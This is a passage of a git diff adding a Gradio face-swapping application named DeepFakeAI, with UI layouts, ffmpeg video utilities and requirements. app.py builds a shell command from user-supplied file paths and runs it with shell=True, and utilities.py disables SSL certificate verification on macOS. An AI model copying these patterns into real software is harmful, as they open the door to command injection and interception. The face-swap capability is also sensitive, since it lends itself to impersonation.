get_video_frame_total(DeepFakeAI.globals.target_path) + DeepFakeAI.globals.trim_frame_start = 0 + DeepFakeAI.globals.trim_frame_end = video_frame_total + return gradio.update(value = 0, maximum = video_frame_total, visible = True), gradio.update(value = video_frame_total, maximum = video_frame_total, visible = True) + return gradio.update(value = None, maximum = None, visible = False), gradio.update(value = None, maximum = None, visible = False) + + +def update_number(name : str, value : int) -> Update: + setattr(DeepFakeAI.globals, name, value) + return gradio.update(value = value) diff --git a/DeepFakeAI/uis/core.py b/DeepFakeAI/uis/core.py new file mode 100644 index 0000000000000000000000000000000000000000..8db45e59b4fd981bc9e0866d1ccc135475219b68 --- /dev/null +++ b/DeepFakeAI/uis/core.py @@ -0,0 +1,67 @@ +from typing import Dict, Optional, Any +import importlib +import sys +import cv2 +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import metadata, wording +from DeepFakeAI.typing import Frame +from DeepFakeAI.uis.typing import Component, ComponentName + +COMPONENTS: Dict[ComponentName, Component] = {} +UI_LAYOUT_METHODS =\ +[ + 'pre_check', + 'render', + 'listen' +] + + +def launch() -> None: + with gradio.Blocks(theme = get_theme(), title = metadata.get('name') + ' ' + metadata.get('version')) as ui: + for ui_layout in DeepFakeAI.globals.ui_layouts: + ui_layout_module = load_ui_layout_module(ui_layout) + ui_layout_module.pre_check() + ui_layout_module.render() + ui_layout_module.listen() + ui.launch(debug=True, show_api=True) + + +def load_ui_layout_module(ui_layout : str) -> Any: + try: + ui_layout_module = importlib.import_module('DeepFakeAI.uis.layouts.' 
+ ui_layout) + for method_name in UI_LAYOUT_METHODS: + if not hasattr(ui_layout_module, method_name): + raise NotImplementedError + except ModuleNotFoundError: + sys.exit(wording.get('ui_layout_not_loaded').format(ui_layout = ui_layout)) + except NotImplementedError: + sys.exit(wording.get('ui_layout_not_implemented').format(ui_layout = ui_layout)) + return ui_layout_module + + +def get_theme() -> gradio.Theme: + return gradio.themes.Soft( + primary_hue = gradio.themes.colors.red, + secondary_hue = gradio.themes.colors.gray, + font = gradio.themes.GoogleFont('Inter') + ).set( + background_fill_primary = '*neutral_50', + block_label_text_size = '*text_sm', + block_title_text_size = '*text_sm' + ) + + +def get_component(name: ComponentName) -> Optional[Component]: + if name in COMPONENTS: + return COMPONENTS[name] + return None + + +def register_component(name: ComponentName, component: Component) -> None: + COMPONENTS[name] = component + + +def normalize_frame(frame : Frame) -> Frame: + return cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) diff --git a/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc b/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..89ffca297f794b12dd76d9df628cfb2e9d0e2730 Binary files /dev/null and b/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc differ diff --git a/DeepFakeAI/uis/layouts/benchmark.py b/DeepFakeAI/uis/layouts/benchmark.py new file mode 100644 index 0000000000000000000000000000000000000000..f58e47a7a0dc5b681fa78a0276df1b482c8c532d --- /dev/null +++ b/DeepFakeAI/uis/layouts/benchmark.py @@ -0,0 +1,37 @@ +import gradio + +from DeepFakeAI.uis.components import about, processors, execution, benchmark +from DeepFakeAI.utilities import conditional_download + + +def pre_check() -> bool: + conditional_download('.assets/examples', + [ + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/source.jpg', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-240p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-360p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-540p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-720p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1080p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1440p.mp4', + 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-2160p.mp4' + ]) + return True + + +def render() -> gradio.Blocks: + with gradio.Blocks() as layout: + with gradio.Row(): + with gradio.Column(scale = 2): + about.render() + processors.render() + execution.render() + with gradio.Column(scale= 5): + benchmark.render() + return layout + + +def listen() -> None: + processors.listen() + execution.listen() + benchmark.listen() diff --git a/DeepFakeAI/uis/layouts/default.py b/DeepFakeAI/uis/layouts/default.py new file mode 100644 index 0000000000000000000000000000000000000000..250e56c7f68f375dd8eb9dac69320aeb1723cce1 --- /dev/null +++ b/DeepFakeAI/uis/layouts/default.py @@ -0,0 +1,44 @@ +import gradio + +from DeepFakeAI.uis.components import about, processors, execution, temp_frame, settings, source, target, preview, trim_frame, face_analyser, face_selector, output_settings, output + + +def pre_check() -> bool: + return True + + +def render() -> gradio.Blocks: 
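load_ui_layout_module in DeepFakeAI/uis/core.py treats any module under DeepFakeAI.uis.layouts as a pluggable layout, provided it defines pre_check, render and listen; a missing method aborts with a wording message. A short usage sketch against the bundled benchmark layout:

```python
# Usage sketch for the layout loader: layouts are imported by name with
# importlib and validated against the required UI_LAYOUT_METHODS.
from DeepFakeAI.uis import core

layout = core.load_ui_layout_module('benchmark')  # bundled layout from this diff
assert all(hasattr(layout, method) for method in ('pre_check', 'render', 'listen'))
```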
+ with gradio.Blocks() as layout: + with gradio.Row(): + with gradio.Column(scale = 2): + about.render() + processors.render() + execution.render() + temp_frame.render() + settings.render() + with gradio.Column(scale = 2): + source.render() + target.render() + output_settings.render() + output.render() + with gradio.Column(scale = 3): + #preview.render() + trim_frame.render() + face_selector.render() + face_analyser.render() + return layout + + +def listen() -> None: + processors.listen() + execution.listen() + settings.listen() + temp_frame.listen() + source.listen() + target.listen() + #preview.listen() + trim_frame.listen() + face_selector.listen() + face_analyser.listen() + output_settings.listen() + output.listen() diff --git a/DeepFakeAI/uis/typing.py b/DeepFakeAI/uis/typing.py new file mode 100644 index 0000000000000000000000000000000000000000..4abe384f07c4b90504e47291674905f85a5b8f52 --- /dev/null +++ b/DeepFakeAI/uis/typing.py @@ -0,0 +1,18 @@ +from typing import Literal, Dict, Any +import gradio + +Component = gradio.File or gradio.Image or gradio.Video or gradio.Slider +ComponentName = Literal\ +[ + 'source_file', + 'target_file', + 'preview_frame_slider', + 'face_recognition_dropdown', + 'reference_face_position_gallery', + 'reference_face_distance_slider', + 'face_analyser_direction_dropdown', + 'face_analyser_age_dropdown', + 'face_analyser_gender_dropdown', + 'frame_processors_checkbox_group' +] +Update = Dict[Any, Any] diff --git a/DeepFakeAI/utilities.py b/DeepFakeAI/utilities.py new file mode 100644 index 0000000000000000000000000000000000000000..dd33cf157f684dc1bad324bca4d9326b8e3f82f2 --- /dev/null +++ b/DeepFakeAI/utilities.py @@ -0,0 +1,190 @@ +import glob +import mimetypes +import os +import platform +import shutil +import ssl +import subprocess +import tempfile +import urllib +from pathlib import Path +from typing import List, Optional + +import onnxruntime +from tqdm import tqdm + +import DeepFakeAI.globals +from DeepFakeAI import wording + +TEMP_DIRECTORY_PATH = os.path.join(tempfile.gettempdir(), 'DeepFakeAI') +TEMP_OUTPUT_NAME = 'temp.mp4' + +# monkey patch ssl +if platform.system().lower() == 'darwin': + ssl._create_default_https_context = ssl._create_unverified_context + + +def run_ffmpeg(args : List[str]) -> bool: + commands = [ 'ffmpeg', '-hide_banner', '-loglevel', 'error' ] + commands.extend(args) + try: + subprocess.check_output(commands, stderr = subprocess.STDOUT) + return True + except subprocess.CalledProcessError: + return False + + +def detect_fps(target_path : str) -> Optional[float]: + commands = [ 'ffprobe', '-v', 'error', '-select_streams', 'v:0', '-show_entries', 'stream=r_frame_rate', '-of', 'default=noprint_wrappers = 1:nokey = 1', target_path ] + output = subprocess.check_output(commands).decode().strip().split('/') + try: + numerator, denominator = map(int, output) + return numerator / denominator + except (ValueError, ZeroDivisionError): + return None + + +def extract_frames(target_path : str, fps : float) -> bool: + temp_directory_path = get_temp_directory_path(target_path) + temp_frame_quality = round(31 - (DeepFakeAI.globals.temp_frame_quality * 0.31)) + trim_frame_start = DeepFakeAI.globals.trim_frame_start + trim_frame_end = DeepFakeAI.globals.trim_frame_end + commands = [ '-hwaccel', 'auto', '-i', target_path, '-q:v', str(temp_frame_quality), '-pix_fmt', 'rgb24', ] + if trim_frame_start is not None and trim_frame_end is not None: + commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ':end_frame=' + 
str(trim_frame_end) + ',fps=' + str(fps) ]) + elif trim_frame_start is not None: + commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ',fps=' + str(fps) ]) + elif trim_frame_end is not None: + commands.extend([ '-vf', 'trim=end_frame=' + str(trim_frame_end) + ',fps=' + str(fps) ]) + else: + commands.extend([ '-vf', 'fps=' + str(fps) ]) + commands.extend([os.path.join(temp_directory_path, '%04d.' + DeepFakeAI.globals.temp_frame_format)]) + return run_ffmpeg(commands) + + +def create_video(target_path : str, fps : float) -> bool: + temp_output_path = get_temp_output_path(target_path) + temp_directory_path = get_temp_directory_path(target_path) + output_video_quality = round(51 - (DeepFakeAI.globals.output_video_quality * 0.5)) + commands = [ '-hwaccel', 'auto', '-r', str(fps), '-i', os.path.join(temp_directory_path, '%04d.' + DeepFakeAI.globals.temp_frame_format), '-c:v', DeepFakeAI.globals.output_video_encoder ] + if DeepFakeAI.globals.output_video_encoder in [ 'libx264', 'libx265', 'libvpx' ]: + commands.extend([ '-crf', str(output_video_quality) ]) + if DeepFakeAI.globals.output_video_encoder in [ 'h264_nvenc', 'hevc_nvenc' ]: + commands.extend([ '-cq', str(output_video_quality) ]) + commands.extend([ '-pix_fmt', 'yuv420p', '-vf', 'colorspace=bt709:iall=bt601-6-625', '-y', temp_output_path ]) + return run_ffmpeg(commands) + + +def restore_audio(target_path : str, output_path : str) -> None: + fps = detect_fps(target_path) + trim_frame_start = DeepFakeAI.globals.trim_frame_start + trim_frame_end = DeepFakeAI.globals.trim_frame_end + temp_output_path = get_temp_output_path(target_path) + commands = [ '-hwaccel', 'auto', '-i', temp_output_path, '-i', target_path ] + if trim_frame_start is None and trim_frame_end is None: + commands.extend([ '-c:a', 'copy' ]) + else: + if trim_frame_start is not None: + start_time = trim_frame_start / fps + commands.extend([ '-ss', str(start_time) ]) + else: + commands.extend([ '-ss', '0' ]) + if trim_frame_end is not None: + end_time = trim_frame_end / fps + commands.extend([ '-to', str(end_time) ]) + commands.extend([ '-c:a', 'aac' ]) + commands.extend([ '-map', '0:v:0', '-map', '1:a:0', '-y', output_path ]) + done = run_ffmpeg(commands) + if not done: + move_temp(target_path, output_path) + + +def get_temp_frame_paths(target_path : str) -> List[str]: + temp_directory_path = get_temp_directory_path(target_path) + return glob.glob((os.path.join(glob.escape(temp_directory_path), '*.' 
+ DeepFakeAI.globals.temp_frame_format))) + + +def get_temp_directory_path(target_path : str) -> str: + target_name, _ = os.path.splitext(os.path.basename(target_path)) + return os.path.join(TEMP_DIRECTORY_PATH, target_name) + + +def get_temp_output_path(target_path : str) -> str: + temp_directory_path = get_temp_directory_path(target_path) + return os.path.join(temp_directory_path, TEMP_OUTPUT_NAME) + + +def normalize_output_path(source_path : str, target_path : str, output_path : str) -> Optional[str]: + if source_path and target_path and output_path: + source_name, _ = os.path.splitext(os.path.basename(source_path)) + target_name, target_extension = os.path.splitext(os.path.basename(target_path)) + if os.path.isdir(output_path): + return os.path.join(output_path, source_name + '-' + target_name + target_extension) + return output_path + + +def create_temp(target_path : str) -> None: + temp_directory_path = get_temp_directory_path(target_path) + Path(temp_directory_path).mkdir(parents = True, exist_ok = True) + + +def move_temp(target_path : str, output_path : str) -> None: + temp_output_path = get_temp_output_path(target_path) + if os.path.isfile(temp_output_path): + if os.path.isfile(output_path): + os.remove(output_path) + shutil.move(temp_output_path, output_path) + + +def clear_temp(target_path : str) -> None: + temp_directory_path = get_temp_directory_path(target_path) + parent_directory_path = os.path.dirname(temp_directory_path) + if not DeepFakeAI.globals.keep_temp and os.path.isdir(temp_directory_path): + shutil.rmtree(temp_directory_path) + if os.path.exists(parent_directory_path) and not os.listdir(parent_directory_path): + os.rmdir(parent_directory_path) + + +def is_image(image_path : str) -> bool: + if image_path and os.path.isfile(image_path): + mimetype, _ = mimetypes.guess_type(image_path) + return bool(mimetype and mimetype.startswith('image/')) + return False + + +def is_video(video_path : str) -> bool: + if video_path and os.path.isfile(video_path): + mimetype, _ = mimetypes.guess_type(video_path) + return bool(mimetype and mimetype.startswith('video/')) + return False + + +def conditional_download(download_directory_path : str, urls : List[str]) -> None: + if not os.path.exists(download_directory_path): + os.makedirs(download_directory_path) + for url in urls: + download_file_path = os.path.join(download_directory_path, os.path.basename(url)) + if not os.path.exists(download_file_path): + request = urllib.request.urlopen(url) # type: ignore[attr-defined] + total = int(request.headers.get('Content-Length', 0)) + with tqdm(total = total, desc = wording.get('downloading'), unit = 'B', unit_scale = True, unit_divisor = 1024) as progress: + urllib.request.urlretrieve(url, download_file_path, reporthook = lambda count, block_size, total_size: progress.update(block_size)) # type: ignore[attr-defined] + + +def resolve_relative_path(path : str) -> str: + return os.path.abspath(os.path.join(os.path.dirname(__file__), path)) + + +def list_module_names(path : str) -> Optional[List[str]]: + if os.path.exists(path): + files = os.listdir(path) + return [Path(file).stem for file in files if not Path(file).stem.startswith('__')] + return None + + +def encode_execution_providers(execution_providers : List[str]) -> List[str]: + return [execution_provider.replace('ExecutionProvider', '').lower() for execution_provider in execution_providers] + + +def decode_execution_providers(execution_providers : List[str]) -> List[str]: + return [provider for provider, encoded_execution_provider in 
zip(onnxruntime.get_available_providers(), encode_execution_providers(onnxruntime.get_available_providers())) if any(execution_provider in encoded_execution_provider for execution_provider in execution_providers)] diff --git a/DeepFakeAI/wording.py b/DeepFakeAI/wording.py new file mode 100644 index 0000000000000000000000000000000000000000..1d70363ea7546eeb3b3ec224eb04848db727718e --- /dev/null +++ b/DeepFakeAI/wording.py @@ -0,0 +1,88 @@ +WORDING =\ +{ + 'python_not_supported': 'Python version is not supported, upgrade to {version} or higher', + 'ffmpeg_not_installed': 'FFMpeg is not installed', + 'source_help': 'select a source image', + 'target_help': 'select a target image or video', + 'output_help': 'specify the output file or directory', + 'frame_processors_help': 'choose from the available frame processors (choices: {choices}, ...)', + 'ui_layouts_help': 'choose from the available ui layouts (choices: {choices}, ...)', + 'keep_fps_help': 'preserve the frames per second (fps) of the target', + 'keep_temp_help': 'retain temporary frames after processing', + 'skip_audio_help': 'omit audio from the target', + 'face_recognition_help': 'specify the method for face recognition', + 'face_analyser_direction_help': 'specify the direction used for face analysis', + 'face_analyser_age_help': 'specify the age used for face analysis', + 'face_analyser_gender_help': 'specify the gender used for face analysis', + 'reference_face_position_help': 'specify the position of the reference face', + 'reference_face_distance_help': 'specify the distance between the reference face and the target face', + 'reference_frame_number_help': 'specify the number of the reference frame', + 'trim_frame_start_help': 'specify the start frame for extraction', + 'trim_frame_end_help': 'specify the end frame for extraction', + 'temp_frame_format_help': 'specify the image format used for frame extraction', + 'temp_frame_quality_help': 'specify the image quality used for frame extraction', + 'output_video_encoder_help': 'specify the encoder used for the output video', + 'output_video_quality_help': 'specify the quality used for the output video', + 'max_memory_help': 'specify the maximum amount of ram to be used (in gb)', + 'execution_providers_help': 'choose from the available execution providers (choices: {choices}, ...)', + 'execution_thread_count_help': 'specify the number of execution threads', + 'execution_queue_count_help': 'specify the number of execution queries', + 'creating_temp': 'Creating temporary resources', + 'extracting_frames_fps': 'Extracting frames with {fps} FPS', + 'processing': 'Processing', + 'downloading': 'Downloading', + 'temp_frames_not_found': 'Temporary frames not found', + 'creating_video_fps': 'Creating video with {fps} FPS', + 'creating_video_failed': 'Creating video failed', + 'skipping_audio': 'Skipping audio', + 'restoring_audio': 'Restoring audio', + 'clearing_temp': 'Clearing temporary resources', + 'processing_image_succeed': 'Processing to image succeed', + 'processing_image_failed': 'Processing to image failed', + 'processing_video_succeed': 'Processing to video succeed', + 'processing_video_failed': 'Processing to video failed', + 'select_image_source': 'Select an image for source path', + 'select_image_or_video_target': 'Select an image or video for target path', + 'no_source_face_detected': 'No source face detected', + 'frame_processor_not_loaded': 'Frame processor {frame_processor} could not be loaded', + 'frame_processor_not_implemented': 'Frame processor {frame_processor} not 
implemented correctly', + 'ui_layout_not_loaded': 'UI layout {ui_layout} could not be loaded', + 'ui_layout_not_implemented': 'UI layout {ui_layout} not implemented correctly', + 'start_button_label': 'START', + 'clear_button_label': 'CLEAR', + 'benchmark_result_dataframe_label': 'BENCHMARK RESULT', + 'benchmark_cycles_slider_label': 'BENCHMARK CYCLES', + 'execution_providers_checkbox_group_label': 'EXECUTION PROVIDERS', + 'execution_thread_count_slider_label': 'EXECUTION THREAD COUNT', + 'execution_queue_count_slider_label': 'EXECUTION QUEUE COUNT', + 'face_analyser_direction_dropdown_label': 'FACE ANALYSER DIRECTION', + 'face_analyser_age_dropdown_label': 'FACE ANALYSER AGE', + 'face_analyser_gender_dropdown_label': 'FACE ANALYSER GENDER', + 'reference_face_gallery_label': 'REFERENCE FACE', + 'face_recognition_dropdown_label': 'FACE RECOGNITION', + 'reference_face_distance_slider_label': 'REFERENCE FACE DISTANCE', + 'output_image_or_video_label': 'OUTPUT', + 'output_video_encoder_dropdown_label': 'OUTPUT VIDEO ENCODER', + 'output_video_quality_slider_label': 'OUTPUT VIDEO QUALITY', + 'preview_image_label': 'PREVIEW', + 'preview_frame_slider_label': 'PREVIEW FRAME', + 'frame_processors_checkbox_group_label': 'FRAME PROCESSORS', + 'keep_fps_checkbox_label': 'KEEP FPS', + 'keep_temp_checkbox_label': 'KEEP TEMP', + 'skip_audio_checkbox_label': 'SKIP AUDIO', + 'temp_frame_format_dropdown_label': 'TEMP FRAME FORMAT', + 'temp_frame_quality_slider_label': 'TEMP FRAME QUALITY', + 'trim_frame_start_slider_label': 'TRIM FRAME START', + 'trim_frame_end_slider_label': 'TRIM FRAME END', + 'source_file_label': 'SOURCE', + 'target_file_label': 'TARGET', + 'point': '.', + 'comma': ',', + 'colon': ':', + 'question_mark': '?', + 'exclamation_mark': '!' +} + + +def get(key : str) -> str: + return WORDING[key] diff --git a/README.md b/README.md index b10d9d5d070f85ae08a7912f4c5757675f4482bb..6751bbd7ce54901de87ee9e0a5aaaac37473e71a 100644 --- a/README.md +++ b/README.md @@ -1,13 +1,14 @@ --- -title: DeepFakeAI V1 -emoji: 👀 -colorFrom: gray -colorTo: pink +title: DeepFakeAI +emoji: ⚡ +colorFrom: red +colorTo: gray sdk: gradio -sdk_version: 4.25.0 +sdk_version: 3.41.0 app_file: app.py pinned: false license: mit +short_description: Next generation image and video face swapper --- -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference +Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/READMET.md b/READMET.md new file mode 100644 index 0000000000000000000000000000000000000000..d748d8998dfc8f6c389412ef331659da46e7f9dd --- /dev/null +++ b/READMET.md @@ -0,0 +1,11 @@ +--- +title: DeepFakeAI +emoji: 🌍 +colorFrom: yellow +colorTo: purple +sdk: static +pinned: false +license: mit +--- + +Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/app.py b/app.py new file mode 100644 index 0000000000000000000000000000000000000000..c174844feea7c6b9f64aae6af2e7a5a2ffa1d560 --- /dev/null +++ b/app.py @@ -0,0 +1,167 @@ +import gradio as gr +import subprocess as sp +import os +import uuid +import time +import shutil + +os.makedirs("./output", exist_ok=True) + +def run(*args): + source, target, unique_id, *rest_args = args + if not os.path.exists(source): + return "Source file does not exist" + if not os.path.exists(target): + return "Target file does not exist" + remove_old_directories("./output", num_minutes=60) + filename = 
diff --git a/app.py b/app.py
new file mode 100644
index 0000000000000000000000000000000000000000..c174844feea7c6b9f64aae6af2e7a5a2ffa1d560
--- /dev/null
+++ b/app.py
@@ -0,0 +1,167 @@
+import gradio as gr
+import subprocess as sp
+import os
+import uuid
+import time
+import shutil
+
+os.makedirs("./output", exist_ok=True)
+
+def run(*args):
+    source, target, unique_id, *rest_args = args
+    if not os.path.exists(source):
+        return "Source file does not exist"
+    if not os.path.exists(target):
+        return "Target file does not exist"
+    remove_old_directories("./output", num_minutes=60)
+    filename = os.path.basename(target)
+    os.makedirs(f"./output/{unique_id}", exist_ok=True)
+    output = f"./output/{unique_id}/{filename}"
+    frame_processor = rest_args[0]
+    selected_frame_processors = ' '.join(frame_processor)
+
+    face_analyser_direction = rest_args[1]
+    face_recognition = rest_args[2]
+    face_analyser_gender = rest_args[3]
+
+    cmd = (
+        f"python run.py --execution-providers cpu -s {source} -t {target} -o {output} "
+        f"--frame-processors {selected_frame_processors} "
+        f"--face-analyser-direction {face_analyser_direction} "
+    )
+    if face_recognition != 'none':
+        cmd += f"--face-recognition {face_recognition} "
+    if face_analyser_gender != 'none':
+        cmd += f"--face-analyser-gender {face_analyser_gender} "
+
+    if len(rest_args) > 4:
+        skip_audio = rest_args[4]
+        keep_fps = rest_args[5]
+        keep_temp = rest_args[6]
+        if skip_audio:
+            cmd += "--skip-audio "
+        if keep_fps:
+            cmd += "--keep-fps "
+        if keep_temp:
+            cmd += "--keep-temp "
+
+    try:
+        print("Started...", cmd)
+        output_text = sp.run(cmd, shell=True, capture_output=True, text=True).stdout
+        print(output_text)
+        return output
+    except Exception as e:
+        return f"An error occurred: {str(e)}"
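run() interpolates user-supplied paths straight into a shell string and executes it with shell=True, so a filename containing a space or a quote breaks the invocation (or injects into the shell). A sketch of a list-based alternative, an illustrative rework rather than what this commit ships:

    import subprocess

    def build_command(source, target, output, frame_processors):
        # argv list: no shell involved, no quoting problems, arguments pass through verbatim
        return ['python', 'run.py', '--execution-providers', 'cpu',
                '-s', source, '-t', target, '-o', output,
                '--frame-processors', *frame_processors]

    result = subprocess.run(build_command('my face.jpg', 'clip.mp4', 'out/clip.mp4', ['face_swapper']),
                            capture_output = True, text = True)
    print(result.stdout)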
+
+def clear_output(unique_id):
+    try:
+        output_path = f"./output/{unique_id}"
+        if os.path.exists(output_path):
+            print(f"Trying to delete output files in {output_path}")
+            for filename in os.listdir(output_path):
+                file_path = os.path.join(output_path, filename)
+                if os.path.isfile(file_path):
+                    os.remove(file_path)
+            print(f"Output files in {output_path} are deleted")
+            return f"Output files for {unique_id} deleted"
+        else:
+            print(f"Output directory {output_path} does not exist")
+            return f"Output directory {output_path} does not exist"
+    except Exception as e:
+        return f"An error occurred: {str(e)}"
+
+def remove_old_directories(directory, num_minutes=60):
+    now = time.time()
+
+    for r, d, f in os.walk(directory):
+        for dir_name in d:
+            dir_path = os.path.join(r, dir_name)
+            timestamp = os.path.getmtime(dir_path)
+            age_minutes = (now - timestamp) / 60  # convert seconds to minutes
+
+            if age_minutes >= num_minutes:
+                try:
+                    print("Removing", dir_path)
+                    shutil.rmtree(dir_path)
+                    print("Directory removed:", dir_path)
+                except Exception as e:
+                    print(e)
+
+
+def get_theme() -> gr.Theme:
+    return gr.themes.Soft(
+        primary_hue = gr.themes.colors.red,
+        secondary_hue = gr.themes.colors.gray,
+        font = gr.themes.GoogleFont('Inter')
+    ).set(
+        background_fill_primary = '*neutral_50',
+        block_label_text_size = '*text_sm',
+        block_title_text_size = '*text_sm'
+    )
+
+with gr.Blocks(theme=get_theme(), title="DeepFakeAI 1.0.0") as ui:
+    with gr.Box():
+        gr.HTML('DeepFakeAI 1.0.1')
+
+    with gr.Box():
+        with gr.Column(scale=3):
+            frame_processor_checkbox = gr.CheckboxGroup(
+                choices = ['face_swapper', 'face_enhancer', 'frame_enhancer'],
+                label = 'FRAME PROCESSORS',
+                value = ['face_swapper'] # default value
+            )
+
+    with gr.Box():
+        with gr.Column(scale=3):
+            face_analyser_direction_dropdown = gr.Dropdown(
+                label = 'FACE ANALYSER DIRECTION',
+                choices = ['left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small'],
+                value = 'left-right'
+            )
+            # renamed from face_analyser_age_dropdown: this dropdown carries the
+            # face recognition mode, which run() reads as rest_args[2]
+            face_recognition_dropdown = gr.Dropdown(
+                label = 'FACE RECOGNITION',
+                choices = ['none'] + ['reference', 'many'],
+                value = 'reference'
+            )
+            face_analyser_gender_dropdown = gr.Dropdown(
+                label = 'FACE ANALYSER GENDER',
+                choices = ['none'] + ['male', 'female'],
+                value = 'none'
+            )
+    unique_id = gr.Textbox(value=str(uuid.uuid4()), visible=False)
+    with gr.Tab("Image: "):
+        source_image = gr.Image(type="filepath", label="SOURCE IMAGE")
+        target_image = gr.Image(type="filepath", label="TARGET IMAGE")
+        image_button = gr.Button("START")
+        clear_button = gr.ClearButton(value="CLEAR")
+        image_output = gr.Image(label="OUTPUT")
+        clear_button.add(image_output)
+
+        image_button.click(
+            run,
+            inputs=[source_image, target_image, unique_id, frame_processor_checkbox, face_analyser_direction_dropdown, face_recognition_dropdown, face_analyser_gender_dropdown],
+            outputs=image_output
+        )
+        clear_button.click(fn=clear_output, inputs=unique_id)
+
+    with gr.Tab("Video: "):
+        source_image_video = gr.Image(type="filepath", label="SOURCE IMAGE")
+        target_video = gr.Video(label="TARGET VIDEO")
+        with gr.Box():
+            skip_audio = gr.Checkbox(label="SKIP AUDIO")
+            keep_fps = gr.Checkbox(label="KEEP FPS")
+            keep_temp = gr.Checkbox(label="KEEP TEMP")
+        video_button = gr.Button("START")
+        clear_video_button = gr.ClearButton(value="CLEAR")
+        video_output = gr.Video(label="OUTPUT")
+        clear_video_button.add(video_output)
+        video_button.click(
+            run,
+            inputs=[source_image_video, target_video, unique_id, frame_processor_checkbox, face_analyser_direction_dropdown, face_recognition_dropdown, face_analyser_gender_dropdown, skip_audio, keep_fps, keep_temp],
+            outputs=video_output
+        )
+        clear_video_button.click(fn=clear_output, inputs=unique_id)
+
+ui.launch(debug=True)
\ No newline at end of file
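Note the coupling in app.py: run(*args) and both click handlers agree only by argument position, with no named mapping between them. A self-contained sketch of that implicit contract (the helper name is hypothetical, for illustration only):

    def unpack_ui_args(args):
        # mirrors how run(*args) in app.py indexes its inputs
        source, target, unique_id, *rest = args
        params = {
            'source': source,
            'target': target,
            'unique_id': unique_id,
            'frame_processors': rest[0],
            'face_analyser_direction': rest[1],
            'face_recognition': rest[2],
            'face_analyser_gender': rest[3]
        }
        if len(rest) > 4:
            # only the video tab appends these three checkbox values
            params.update(skip_audio = rest[4], keep_fps = rest[5], keep_temp = rest[6])
        return params

    print(unpack_ui_args(('face.jpg', 'clip.mp4', 'abc123', ['face_swapper'], 'left-right', 'reference', 'none')))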
diff --git a/del.py b/del.py
new file mode 100644
index 0000000000000000000000000000000000000000..d0e8f29496fc132c2c04590b0b37e365a2664817
--- /dev/null
+++ b/del.py
@@ -0,0 +1,9 @@
+import shutil
+import gradio as gr
+
+def delt(text):
+    # the text input is ignored; this helper simply wipes the shared output directory
+    shutil.rmtree("./output")
+    return "Removed successfully..."
+
+gr.Interface(delt, "text", "text").launch(debug=True)
\ No newline at end of file
diff --git a/gfpgan/weights/detection_Resnet50_Final.pth b/gfpgan/weights/detection_Resnet50_Final.pth
new file mode 100644
index 0000000000000000000000000000000000000000..16546738ce0a00a9fd47585e0fc52744d31cc117
--- /dev/null
+++ b/gfpgan/weights/detection_Resnet50_Final.pth
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6d1de9c2944f2ccddca5f5e010ea5ae64a39845a86311af6fdf30841b0a5a16d
+size 109497761
diff --git a/gfpgan/weights/parsing_parsenet.pth b/gfpgan/weights/parsing_parsenet.pth
new file mode 100644
index 0000000000000000000000000000000000000000..1ac2efc50360a79c9905dbac57d9d99cbfbe863c
--- /dev/null
+++ b/gfpgan/weights/parsing_parsenet.pth
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3d558d8d0e42c20224f13cf5a29c79eba2d59913419f945545d8cf7b72920de2
+size 85331193
diff --git a/mypy.ini b/mypy.ini
new file mode 100644
index 0000000000000000000000000000000000000000..64218bc23688632a08c98ec4a0451ed46f8ed5e5
--- /dev/null
+++ b/mypy.ini
@@ -0,0 +1,7 @@
+[mypy]
+check_untyped_defs = True
+disallow_any_generics = True
+disallow_untyped_calls = True
+disallow_untyped_defs = True
+ignore_missing_imports = True
+strict_optional = False
diff --git a/requirements-ci.txt b/requirements-ci.txt
new file mode 100644
index 0000000000000000000000000000000000000000..f381ae5dc8bd37823ff98638ff252be9bbce8eec
--- /dev/null
+++ b/requirements-ci.txt
@@ -0,0 +1,11 @@
+insightface==0.7.3
+numpy==1.24.3
+onnx==1.14.0
+onnxruntime==1.15.1
+opencv-python==4.8.0.74
+opennsfw2==0.10.2
+protobuf==4.23.4
+pytest==7.4.0
+psutil==5.9.5
+tensorflow==2.13.0
+tqdm==4.65.0
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000000000000000000000000000000000000..56c15587e36e0caad4e8d2b3fe939a57b52135bd
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,20 @@
+--extra-index-url https://download.pytorch.org/whl/cu118
+pysqlite3
+python-telegram-bot
+gfpgan==1.3.8
+gradio==3.40.1
+insightface==0.7.3
+numpy==1.24.3
+onnx==1.14.0
+onnxruntime==1.15.1; python_version != '3.9' and sys_platform == 'darwin' and platform_machine != 'arm64'
+onnxruntime-coreml==1.13.1; python_version == '3.9' and sys_platform == 'darwin' and platform_machine != 'arm64'
+onnxruntime-gpu==1.15.1; sys_platform != 'darwin'
+onnxruntime-silicon==1.13.1; sys_platform == 'darwin' and platform_machine == 'arm64'
+opencv-python==4.8.0.74
+opennsfw2==0.10.2
+pillow==10.0.0
+protobuf==4.23.4
+psutil==5.9.5
+realesrgan==0.3.0
+tensorflow==2.13.0
+tqdm==4.65.0
